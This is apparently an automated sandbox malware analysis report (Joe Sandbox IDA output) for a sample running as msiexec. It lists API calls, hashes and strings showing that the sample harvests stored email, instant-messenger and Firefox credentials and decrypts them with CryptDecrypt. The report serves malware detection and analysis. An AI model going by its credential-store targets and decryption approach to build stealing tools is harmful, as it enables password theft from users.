                                                                                        • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                        • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                        • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                        • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                          • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                          • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                        • memset.MSVCRT ref: 00408620
                                                                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                        • memset.MSVCRT ref: 00408671
                                                                                        Strings
                                                                                        • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                        • String ID: Software\Google\Google Talk\Accounts
                                                                                        • API String ID: 3996936265-1079885057
                                                                                        • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                        • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                        • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                        • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                        • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$_strcmpimemset
                                                                                        • String ID: /stext
                                                                                        • API String ID: 520177685-3817206916
                                                                                        • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                        • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                        • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                        • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                        APIs
                                                                                          • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                        • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 145871493-0
                                                                                        • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                        • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                        • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                        • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                        APIs
                                                                                        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                          • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                          • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                          • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                        • String ID:
                                                                                        • API String ID: 4165544737-0
                                                                                        • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                        • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                        • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                        • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                        • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                        • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                        • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                        • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                        • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                        • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                        • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                        • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                        • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                        APIs
                                                                                        • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 1863332320-0
                                                                                        • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                        • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                        • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                        • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                        • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                        • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                        • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                        • API String ID: 2238633743-192783356
                                                                                        • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                        • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                        • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                        • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString_mbscmpstrlen
                                                                                        • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                        • API String ID: 3963849919-1658304561
                                                                                        • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                        • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                        • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                        • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                        • String ID: (yE$(yE$(yE
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                        • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040EBD8
                                                                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                        • memset.MSVCRT ref: 0040EC2B
                                                                                        • memset.MSVCRT ref: 0040EC47
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                        • memset.MSVCRT ref: 0040ECDD
                                                                                        • memset.MSVCRT ref: 0040ECF2
                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                        • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                        • memset.MSVCRT ref: 0040EDE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                        • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                        APIs
                                                                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                          • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                          • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                          • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                        • memset.MSVCRT ref: 0040E5B8
                                                                                        • memset.MSVCRT ref: 0040E5CD
                                                                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                        • memset.MSVCRT ref: 0040E6B5
                                                                                        • memset.MSVCRT ref: 0040E6CC
                                                                                          • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                          • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                        • memset.MSVCRT ref: 0040E736
                                                                                        • memset.MSVCRT ref: 0040E74F
                                                                                        • sprintf.MSVCRT ref: 0040E76D
                                                                                        • sprintf.MSVCRT ref: 0040E788
                                                                                        • _strcmpi.MSVCRT ref: 0040E79E
                                                                                        • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                        • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                        • memset.MSVCRT ref: 0040E858
                                                                                        • sprintf.MSVCRT ref: 0040E873
                                                                                        • _strcmpi.MSVCRT ref: 0040E889
                                                                                        • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                        • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                        • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                        • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                        • GetDC.USER32 ref: 004104E2
                                                                                        • strlen.MSVCRT ref: 00410522
                                                                                        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                        • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                        • sprintf.MSVCRT ref: 00410640
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                        • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                        • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                        • GetClientRect.USER32(?,?), ref: 00410737
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004024F5
                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                        • _mbscpy.MSVCRT(?,00000000,?,?,?,68127B60,?,00000000), ref: 00402533
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$QueryValuememset
                                                                                        • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00402869
                                                                                          • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                        • _mbscpy.MSVCRT(?,?,68127B60,?,00000000), ref: 004028A3
                                                                                          • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,68127B60,?,00000000), ref: 0040297B
                                                                                          • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                        • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                        APIs
                                                                                        • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                        • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                        • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                        • memset.MSVCRT ref: 0040FCFD
                                                                                        • memset.MSVCRT ref: 0040FD1D
                                                                                        • memset.MSVCRT ref: 0040FD3B
                                                                                        • memset.MSVCRT ref: 0040FD54
                                                                                        • memset.MSVCRT ref: 0040FD72
                                                                                        • memset.MSVCRT ref: 0040FD8B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                        • memset.MSVCRT ref: 0040FE45
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                        • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                        • sprintf.MSVCRT ref: 0040FF0F
                                                                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                        • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                        Strings
                                                                                        • {Unknown}, xrefs: 0040FD02
                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                        • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                        • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
